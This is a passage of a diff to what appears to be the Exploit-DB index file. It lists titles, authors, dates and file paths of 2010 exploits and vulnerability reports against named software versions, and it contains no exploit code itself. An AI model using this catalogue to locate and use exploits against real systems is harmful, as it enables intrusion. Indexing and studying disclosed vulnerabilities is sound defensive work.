-11565,platforms/php/webapps/11565.txt,"phpCOIN v1.2.1 (mod.php) SQL Injection Vulnerability",2010-02-24,Baybora,php,webapps,0 +11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection Vulnerability",2010-02-24,Gamoscu,php,webapps,0 +11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 (mod.php) - SQL Injection Vulnerability",2010-02-24,Baybora,php,webapps,0 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0 -11569,platforms/php/webapps/11569.txt,"Web Server Creator - Web Portal v 0.1 Multi Vulnerability",2010-02-24,indoushka,php,webapps,0 -11570,platforms/php/webapps/11570.txt,"PBBoard Version 2.0.5 Mullti Vulnerability",2010-02-24,"indoushka ",php,webapps,0 -11571,platforms/php/webapps/11571.txt,"Maian Uploader v4.0 Shell Upload Vulnerability",2010-02-24,"indoushka ",php,webapps,0 +11569,platforms/php/webapps/11569.txt,"Web Server Creator - Web Portal v 0.1 Multi Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 +11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 +11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 11573,platforms/windows/local/11573.c,"MediaCoder v0.7.3.4605 Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0 11574,platforms/hardware/dos/11574.py,"iPhone WebCore::CSSSelector() Remote Crash Vulnerability",2010-02-24,t12,hardware,dos,0 11575,platforms/php/webapps/11575.txt,"Softbiz Classifieds PLUS Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0 11576,platforms/php/webapps/11576.txt,"Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability",2010-02-25,"Easy Laster",php,webapps,0 -11577,platforms/php/webapps/11577.txt,"GameScript v3.0 SQL Injection Vulnerability",2010-02-25,FormatXformat,php,webapps,0 +11577,platforms/php/webapps/11577.txt,"GameScript 3.0 - SQL Injection Vulnerability",2010-02-25,FormatXFormaT,php,webapps,0 11578,platforms/php/webapps/11578.php,"Joomla Component com_joomlaconnect_be Blind Injection Vulnerability",2010-02-25,Snakespc,php,webapps,0 11579,platforms/php/webapps/11579.txt,"WebAdministrator Lite CMS SQL Injection Vulnerability",2010-02-25,Ariko-Security,php,webapps,0 -11580,platforms//webapps/11580.txt,"FileExecutive v1 Multiple Vulnerabilities",2010-02-26,ViRuSMaN,,webapps,0 -11581,platforms/windows/local/11581.py,"Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit",2010-02-26,mr_me,windows,local,0 +11580,platforms/aix/webapps/11580.txt,"FileExecutive 1 - Multiple Vulnerabilities",2010-02-26,ViRuSMaN,aix,webapps,0 +11581,platforms/windows/local/11581.py,"Orbital Viewer 1.04 - (.orb) Local Universal SEH Overflow Exploit (0day)",2010-02-26,mr_me,windows,local,0 11582,platforms/php/webapps/11582.txt,"DZ Erotik Auktionshaus 4.rgo news.php - SQL Injection Vulnerability",2010-02-27,"Easy Laster",php,webapps,0 -11583,platforms/php/webapps/11583.pl,"Gravity Board X v2.0 BETA (Public Release 3) SQL Injection Vulnerability",2010-02-27,Ctacok,php,webapps,0 +11583,platforms/php/webapps/11583.pl,"Gravity Board X 2.0 BETA (Public Release 3) - SQL Injection Vulnerability",2010-02-27,Ctacok,php,webapps,0 11584,platforms/php/webapps/11584.txt,"Project Man <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 11585,platforms/php/webapps/11585.txt,"phpCDB <= 1.0 Local File Include Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 11586,platforms/php/webapps/11586.txt,"phpRAINCHECK <= 1.0.1 SQL Injection Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 -11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 Multiple File Include Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 +11587,platforms/php/webapps/11587.txt,"ProMan <= 0.1.1 Multiple File Include Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 11588,platforms/php/webapps/11588.txt,"phpMySite (XSS/SQLi) Multiple Vulnerabilities",2010-02-27,Crux,php,webapps,0 11589,platforms/asp/webapps/11589.txt,"Pre Classified Listings SQL Injection Vulnerability",2010-02-27,Crux,asp,webapps,0 11590,platforms/multiple/dos/11590.php,"Mozilla Firefox <= 3.6 Denial Of Service Exploit",2010-02-27,Ale46,multiple,dos,0 11592,platforms/php/webapps/11592.txt,"Scripts Feed Business Directory SQL Injection Vulnerability",2010-02-27,Crux,php,webapps,0 11593,platforms/php/webapps/11593.txt,"Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability",2010-02-27,cr4wl3r,php,webapps,0 11595,platforms/php/webapps/11595.php,"Joomla Component com_paxgallery Blind Injection Vulnerability",2010-02-27,Snakespc,php,webapps,0 -11596,platforms/php/webapps/11596.txt,"Slaed CMS v4 Multiple Vulnerabilities",2010-02-27,indoushka,php,webapps,0 +11596,platforms/php/webapps/11596.txt,"Slaed CMS 4.0 - Multiple Vulnerabilities",2010-02-27,"indoushka salah el ddine",php,webapps,0 11597,platforms/hardware/dos/11597.py,"RCA DCM425 Cable Modem micro_httpd DoS/PoC",2010-02-28,ad0nis,hardware,dos,0 11599,platforms/php/webapps/11599.txt,"Uiga Personal Portal index.php SQL Injection Vulnerability",2010-02-28,"Easy Laster",php,webapps,0 11600,platforms/php/webapps/11600.txt,"Uiga Fan Club index.php SQL Injection Vulnerability",2010-02-28,"Easy Laster",php,webapps,0 @@ -10617,60 +10617,60 @@ id,file,description,date,author,platform,type,port 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 11609,platforms/php/webapps/11609.txt,"phptroubleticket (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 -11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,indoushka,asp,webapps,0 -11612,platforms/php/webapps/11612.txt,"osCSS v1.2.1 Database Backups Disclosure",2010-03-02,indoushka,php,webapps,0 -11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager v1.10 Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 -11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,indoushka,php,webapps,0 +11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,"indoushka salah el ddine",asp,webapps,0 +11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,"indoushka salah el ddine",php,webapps,0 +11613,platforms/php/webapps/11613.txt,"PHP Advanced Transfer Manager 1.10 - Shell Upload Vulnerability",2010-03-02,"indoushka salah el ddine",php,webapps,0 +11614,platforms/php/webapps/11614.txt,"Uploadify Sample Collection Shell Upload Vulnerability",2010-03-02,"indoushka salah el ddine",php,webapps,0 11615,platforms/win32/remote/11615.txt,"Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability",2010-03-02,"Maurycy Prodeus ",win32,remote,0 11616,platforms/php/webapps/11616.txt,"My Little Forum contact.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 -11617,platforms/windows/dos/11617.txt,"Mozilla Firefox v3.6 and Opera Long String Crash(0day) Exploit",2010-03-02,"Asheesh kumar Mani Tripathi",windows,dos,0 -11618,platforms/windows/remote/11618.pl,"ProSSHD v1.2 20090726 Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 +11617,platforms/windows/dos/11617.txt,"Opera + Mozilla Firefox 3.6 - Long String Crash (0day) Exploit",2010-03-02,"Asheesh Kumar Mani Tripathi",windows,dos,0 +11618,platforms/windows/remote/11618.pl,"ProSSHD 1.2 20090726 - Buffer Overflow Exploit",2010-03-02,"S2 Crew",windows,remote,0 11619,platforms/php/webapps/11619.txt,"Uiga Church Portal index.php SQL Injection",2010-03-02,"Easy Laster",php,webapps,0 -11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi v1.0 Shell Upload Vulnerability",2010-03-03,indoushka,php,webapps,0 +11620,platforms/php/webapps/11620.txt,"Dosya Yukle Scrtipi 1.0 - Shell Upload Vulnerability",2010-03-03,"indoushka salah el ddine",php,webapps,0 11621,platforms/php/webapps/11621.txt,"Gnat-TGP <= 1.2.20 Remote File Include Vulnerability",2010-03-03,cr4wl3r,php,webapps,0 11622,platforms/windows/dos/11622.php,"Opera <= 10.50 integer overflow",2010-03-03,"Marcin Ressel",windows,dos,0 11623,platforms/php/webapps/11623.txt,"smartplugs 1.3 SQL Injection showplugs.php",2010-03-03,"Easy Laster",php,webapps,0 11624,platforms/php/webapps/11624.pl,"MiNBank 1.5.0 Remote Command Execution Exploit",2010-03-03,JosS,php,webapps,0 11625,platforms/php/webapps/11625.txt,"Joomla Component com_blog directory traversal",2010-03-03,"DevilZ TM",php,webapps,0 11627,platforms/php/webapps/11627.txt,"PHPNUKE CMS (Survey and Poll) SQL Injection Vulnerability",2010-03-04,SENOT,php,webapps,0 -11628,platforms/windows/dos/11628.pl,"AKoff MIDI Player v1.00 Buffer Overflow Exploit",2010-03-04,cr4wl3r,windows,dos,0 +11628,platforms/windows/dos/11628.pl,"AKoff MIDI Player 1.00 - Buffer Overflow Exploit",2010-03-04,cr4wl3r,windows,dos,0 11630,platforms/windows/dos/11630.pl,"WinSmMuPl 1.2.5 (.mp3) Local Crash PoC",2010-03-04,cr4wl3r,windows,dos,0 11631,platforms/php/webapps/11631.txt,"PhP-Nuke user.php SQL Injection",2010-03-04,"Easy Laster",php,webapps,0 -11632,platforms/windows/dos/11632.txt,"Orb v2.0.01.0049-V2.54.0018 DirectShow DOS",2010-03-04,"Matthew Bergin",windows,dos,0 +11632,platforms/windows/dos/11632.txt,"Orb 2.0.01.0049 - 2.54.0018 - DirectShow DOS",2010-03-04,"Matthew Bergin",windows,dos,0 11633,platforms/hardware/dos/11633.pl,"Sagem Routers Remote Reset Exploit",2010-03-04,AlpHaNiX,hardware,dos,0 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers Remote Auth bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 -11635,platforms/php/webapps/11635.pl,"ONECMS v2.5 SQL Injection Vulnerability",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 +11635,platforms/php/webapps/11635.pl,"ONECMS 2.5 - SQL Injection Vulnerability",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 -11637,platforms/php/webapps/11637.txt,"Auktionshaus v3.0.0.1 news.php (id) SQL Injection Vulnerability",2010-03-05,"Easy Laster",php,webapps,0 +11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - news.php (id) SQL Injection Vulnerability",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability",2010-03-05,JosS,php,webapps,0 -11639,platforms/windows/dos/11639.txt,"Google Chrome v4.0.249 XML Denial of Service PoC",2010-03-06,Blade,windows,dos,0 +11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service PoC",2010-03-06,Blade,windows,dos,0 11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 (mod.php) LFI Vulnerability",2010-03-06,_mlk_,php,webapps,0 11643,platforms/php/webapps/11643.txt,"dev4u CMS (Personenseiten) go_target.php SQL Injection",2010-03-06,"Easy Laster",php,webapps,0 11644,platforms/multiple/dos/11644.py,"Flare <= 0.6 Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 11646,platforms/php/webapps/11646.pl,"BigForum Version: 4.5 SQL INJECTION",2010-03-07,Ctacok,php,webapps,0 -11647,platforms/windows/local/11647.pl,"Yahoo Player v1.0 (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 -11648,platforms/php/webapps/11648.txt,"Bild Flirt System V2.0 index.php (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 +11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 +11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - index.php (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 -11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 +11654,platforms/php/webapps/11654.txt,"DZ Auktionshaus ""V4.rgo"" (id) news.php - SQL Injection Vulnerability",2010-03-08,"Easy Laster",php,webapps,0 11655,platforms/php/webapps/11655.txt,"TRIBISUR <= 2.0 Local File Include Vulnerability",2010-03-08,cr4wl3r,php,webapps,0 11656,platforms/windows/local/11656.py,"QuickZip 4.x (.zip) 0day Local Universal Buffer Overflow PoC Exploit",2010-03-08,"corelanc0d3r and mr_me",windows,local,0 11657,platforms/php/webapps/11657.txt,"Chaton <= 1.5.2 Local File Include Vulnerability",2010-03-08,cr4wl3r,php,webapps,0 -11660,platforms/php/webapps/11660.txt,"PHP File Sharing System v1.5.1 Multiple Vulnerabilities",2010-03-09,blake,php,webapps,0 -11661,platforms/windows/remote/11661.txt,"SAP GUI version 7.10 WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 +11660,platforms/php/webapps/11660.txt,"PHP File Sharing System 1.5.1 - Multiple Vulnerabilities",2010-03-09,Blake,php,webapps,0 +11661,platforms/windows/remote/11661.txt,"SAP GUI 7.10 - WebViewer3D Active-X JIT-Spray Exploit",2010-03-09,"Alexey Sintsov",windows,remote,0 11662,platforms/multiple/remote/11662.txt,"Apache Spamassassin Milter Plugin Remote Root Command Execution",2010-03-09,Kingcope,multiple,remote,0 -11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= v5.33 Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 -11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail v3.2.0-2.0 | Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 +11663,platforms/windows/local/11663.txt,"Lenovo Hotkey Driver <= 5.33 - Privilege Escalation",2010-03-09,"Chilik Tamir",windows,local,0 +11666,platforms/php/webapps/11666.txt,"Uebimiau Webmail 3.2.0-2.0 - Email Disclosure",2010-03-09,"Z3r0c0re, R4vax",php,webapps,0 11667,platforms/php/webapps/11667.txt,"Joomla Component com_hezacontent SQL injection Vulnerability (id)",2010-03-09,kaMtiEz,php,webapps,0 -11668,platforms/windows/remote/11668.rb,"Easy FTP Server v1.7.0.2 CWD Remote BoF - MSF Module",2010-03-09,Blake,windows,remote,0 +11668,platforms/windows/remote/11668.rb,"Easy FTP Server 1.7.0.2 - CWD Remote BoF (MSF Module)",2010-03-09,Blake,windows,remote,0 11669,platforms/windows/dos/11669.py,"JAD java decompiler 1.5.8g (argument) Local Crash",2010-03-09,l3D,windows,dos,0 11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g (.class) Stack Overflow DoS",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 11672,platforms/php/webapps/11672.txt,"Wild CMS SQL injection vulnerability",2010-03-09,Ariko-Security,php,webapps,0 -11674,platforms/php/webapps/11674.txt,"NUs Newssystem v1.02 (id) SQL Injection Vulnerability",2010-03-09,n3w7u,php,webapps,0 -11676,platforms/php/webapps/11676.txt,"Campsite v3.3.5 CSRF Vulnerability",2010-03-10,"Pratul Agrawal",php,webapps,0 -11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management v2.8.9 SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",hardware,webapps,0 +11674,platforms/php/webapps/11674.txt,"NUs Newssystem 1.02 - (id) SQL Injection Vulnerability",2010-03-09,n3w7u,php,webapps,0 +11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - CSRF Vulnerability",2010-03-10,"Pratul Agrawal",php,webapps,0 +11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",hardware,webapps,0 11678,platforms/php/webapps/11678.txt,"PhpCityPortal Multiple Vulnerabilities",2010-03-10,R3d-D3v!L,php,webapps,0 11679,platforms/php/webapps/11679.txt,"Softbiz Jobs and Recruitment Script (search_result.php) SQL Injection Vulnerability",2010-03-10,"Easy Laster",php,webapps,0 11680,platforms/php/webapps/11680.txt,"Anantasoft Gazelle CMS CSRF Vulnerability",2010-03-10,"Pratul Agrawal",php,webapps,0 @@ -10701,43 +10701,43 @@ id,file,description,date,author,platform,type,port 11709,platforms/php/webapps/11709.txt,"Joomla Component com_comp SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11710,platforms/php/webapps/11710.php,"Joomla Component com_races Blind SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 11711,platforms/php/webapps/11711.txt,"Azeno CMS SQL Injection Vulnerability",2010-03-13,"DevilZ TM",php,webapps,0 -11713,platforms/windows/local/11713.pl,"Yahoo Player v1.0 (.m3u) Buffer Overflow Exploit (direct EIP overwrite)",2010-03-13,Bombard,windows,local,0 +11713,platforms/windows/local/11713.pl,"Yahoo Player 1.0 - (.m3u) Buffer Overflow Exploit",2010-03-13,Bombard,windows,local,0 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player (.m3u file) stack buffer Overflow",2010-03-13,ItSecTeam,windows,dos,0 11715,platforms/php/webapps/11715.txt,"systemsoftware Community Black index.php SQL Injection",2010-03-13,"Easy Laster",php,webapps,0 11717,platforms/multiple/dos/11717.php,"Multiple PHP Functions - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0 -11718,platforms/php/webapps/11718.txt,"Xbtit v2.0.0 SQL Injection Vulnerability",2010-03-13,Ctacok,php,webapps,0 +11718,platforms/php/webapps/11718.txt,"Xbtit 2.0.0 - SQL Injection Vulnerability",2010-03-13,Ctacok,php,webapps,0 11719,platforms/php/webapps/11719.txt,"Mambo Component com_mambads SQL Injection Vulnerability",2010-03-13,Dreadful,php,webapps,0 -11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 -11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP v1.01 Multiple Vulnerabilities",2010-03-13,ItSecTeam,php,webapps,0 -11722,platforms/php/webapps/11722.txt,"Ad Board Script v1.01 Local File Inclusion",2010-03-13,ItSecTeam,php,webapps,0 +11720,platforms/linux/remote/11720.py,"MicroWorld eScan Antivirus < 3.x Remote Root Command Execution",2010-03-13,"Mohammed almutairi",linux,remote,0 +11721,platforms/php/webapps/11721.txt,"GeekHelps ADMP 1.01 - Multiple Vulnerabilities",2010-03-13,ItSecTeam,php,webapps,0 +11722,platforms/php/webapps/11722.txt,"Ad Board Script 1.01 - Local File Inclusion",2010-03-13,ItSecTeam,php,webapps,0 11723,platforms/cgi/webapps/11723.pl,"Trouble Ticket Express <= 3.01 Remote Code Execution/Directory Traversal",2010-03-14,zombiefx,cgi,webapps,0 -11724,platforms/windows/dos/11724.pl,"GOM Player v2.1.21 avi File DoS",2010-03-14,En|gma7,windows,dos,0 +11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection Vulnerability",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability",2010-03-14,Inj3ct0r,php,webapps,0 11727,platforms/php/webapps/11727.txt,"Front Door v0.4b SQL Injection Vulnerability",2010-03-14,Blake,php,webapps,0 -11728,platforms/windows/dos/11728.pl,"Media Player V6.4.9.1 with K-Lite Codec Pack DoS/Crash (.avi file)",2010-03-14,En|gma7,windows,dos,0 +11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 Local File Include Vulnerability",2010-03-14,cr4wl3r,php,webapps,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote Sql Injection Vulnerability",2010-03-14,Snakespc,php,webapps,0 -11731,platforms/php/webapps/11731.html,"RogioBiz_PHP_file_manager_V1.2 bypass admin exploit",2010-03-14,ItSecTeam,php,webapps,0 +11731,platforms/php/webapps/11731.html,"RogioBiz PHP Fle Manager 1.2 - Bypass Admin Exploit",2010-03-14,ItSecTeam,php,webapps,0 11732,platforms/php/webapps/11732.txt,"Php-Nuke - Local File Include Vulnerability",2010-03-14,ItSecTeam,php,webapps,0 11733,platforms/php/webapps/11733.txt,"phppool media Domain Verkaufs und Auktions Portal index.php SQL Injection",2010-03-14,"Easy Laster",php,webapps,0 -11734,platforms/windows/dos/11734.py,"httpdx v1.5.3b Multiple - Remote Pre-Authentication DoS (PoC crash)",2010-03-14,loneferret,windows,dos,0 +11734,platforms/windows/dos/11734.py,"httpdx 1.5.3b - Multiple Remote Pre-Authentication DoS (PoC)",2010-03-14,loneferret,windows,dos,0 11735,platforms/php/webapps/11735.php,"deV!L`z Clanportal 1.5.2 Remote File Include Vulnerability",2010-03-14,cr4wl3r,php,webapps,0 11736,platforms/linux/dos/11736.py,"Kerio MailServer 6.2.2 preauth Remote Denial of Service PoC",2006-12-14,"Evgeny Legerov",linux,dos,389 -11737,platforms/php/webapps/11737.txt,"PhpMyLogon v2 SQL Injection Vulnerability",2010-03-14,Blake,php,webapps,0 -11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite v2.1.5 Local File Include",2010-03-15,jdc,php,webapps,0 -11739,platforms/php/webapps/11739.txt,"PHP Classifieds v7.5 Blind SQL Injection Vulnerability",2010-03-15,ItSecTeam,php,webapps,0 -11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator v1.0.8 Local File Include",2010-03-15,jdc,php,webapps,0 -11741,platforms/php/webapps/11741.txt,"Phenix v3.5b SQL Injection Vulnerability",2010-03-15,ItSecTeam,php,webapps,0 +11737,platforms/php/webapps/11737.txt,"PhpMyLogon 2.0 - SQL Injection Vulnerability",2010-03-14,Blake,php,webapps,0 +11738,platforms/php/webapps/11738.txt,"Joomla component com_gcalendar Suite 2.1.5 - Local File Include",2010-03-15,jdc,php,webapps,0 +11739,platforms/php/webapps/11739.txt,"PHP Classifieds 7.5 - Blind SQL Injection Vulnerability",2010-03-15,ItSecTeam,php,webapps,0 +11740,platforms/php/webapps/11740.txt,"Ninja RSS Syndicator 1.0.8 - Local File Include",2010-03-15,jdc,php,webapps,0 +11741,platforms/php/webapps/11741.txt,"Phenix 3.5b - SQL Injection Vulnerability",2010-03-15,ItSecTeam,php,webapps,0 11742,platforms/windows/remote/11742.rb,"Open & Compact FTPd 1.2 Pre-Authentication Buffer Overflow (meta)",2010-03-15,Blake,windows,remote,0 -11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX v2.1.0 Local File Include",2010-03-15,jdc,php,webapps,0 -11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross Site Scripting Vulnerability",2010-03-15,indoushka,php,webapps,0 -11745,platforms/php/webapps/11745.txt,"FreeHost Version 1.00 Upload Vulnerability",2010-03-15,indoushka,php,webapps,0 +11743,platforms/php/webapps/11743.txt,"Joomla component com_rpx Ulti RPX 2.1.0 - Local File Include",2010-03-15,jdc,php,webapps,0 +11744,platforms/php/webapps/11744.txt,"Duhok Forum 1.0 script Cross Site Scripting Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0 +11745,platforms/php/webapps/11745.txt,"FreeHost 1.00 - Upload Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0 11746,platforms/php/webapps/11746.txt,"Torrent Hoster Remont Upload Exploit",2010-03-15,El-Kahina,php,webapps,0 11747,platforms/php/webapps/11747.txt,"CH-CMS.ch-V2 Upload Vulnerability",2010-03-15,El-Kahina,php,webapps,0 -11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability",2010-03-15,indoushka,php,webapps,0 -11749,platforms/php/webapps/11749.txt,"Subdreamer.v3.0.1 cms upload Vulnerability",2010-03-15,indoushka,php,webapps,0 -11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= v8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Overflow Exploit",2010-03-15,mr_me,windows,remote,0 +11748,platforms/php/webapps/11748.txt,"INTERSPIRE SHOPPING CART 5.5.4 - Ultimate Edition backup dump Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0 +11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0 +11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Overflow Exploit",2010-03-15,mr_me,windows,remote,0 11752,platforms/php/webapps/11752.txt,"Joomla com_org SQL Injection Vulnerability (letter parameter)",2010-03-15,kazuya,php,webapps,0 11754,platforms/php/webapps/11754.txt,"Address Book Script v 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 11755,platforms/php/webapps/11755.txt,"osDate v 2.1.9 - Remote File Inclusion Vulnerabilities",2010-03-15,NoGe,php,webapps,0 @@ -10746,7 +10746,7 @@ id,file,description,date,author,platform,type,port 11758,platforms/php/webapps/11758.txt,"Joomla Component com_ganalytics - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11759,platforms/php/webapps/11759.txt,"Joomla Component com_sectionex - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11760,platforms/php/webapps/11760.txt,"Joomla Component com_rokdownloads - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 -11761,platforms/php/webapps/11761.txt,"Preisschlacht V4 Flash System SQL Injection (seite&aid) index.php",2010-03-15,"Easy Laster",php,webapps,0 +11761,platforms/php/webapps/11761.txt,"Preisschlacht 4.0 Flash System - SQL Injection (seite&aid) index.php",2010-03-15,"Easy Laster",php,webapps,0 11763,platforms/multiple/dos/11763.pl,"Embedthis Appweb 3.1.2 Remote DoS",2010-03-15,chr1x,multiple,dos,0 11764,platforms/windows/local/11764.pl,"QuickZip 4.60.019 Stack BOF - XP SP3",2010-03-15,corelanc0d3r,windows,local,0 11765,platforms/windows/remote/11765.txt,"ArGoSoft FTP Server .NET 1.0.2.1 - Directory Traversal Vulnerability",2010-03-15,dmnt,windows,remote,21 @@ -10757,12 +10757,12 @@ id,file,description,date,author,platform,type,port 11770,platforms/linux/dos/11770.txt,"WFTPD 3.3 Remote REST DoS",2010-03-16,dmnt,linux,dos,21 11771,platforms/php/webapps/11771.txt,"osCMax 2.0 (fckeditor) Remote File Upload",2010-03-16,ITSecTeam,php,webapps,0 11772,platforms/php/webapps/11772.txt,"Joomla Component com_rwcards - Local File Inclusion",2010-03-16,altbta,php,webapps,0 -11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form v1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 +11773,platforms/php/webapps/11773.txt,"Free Real Estate Contact Form 1.09 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0 -11775,platforms/php/webapps/11775.txt,"Short URL v1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 +11775,platforms/php/webapps/11775.txt,"Short URL 1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 11777,platforms/php/webapps/11777.txt,"EGroupware 1.6.002 and 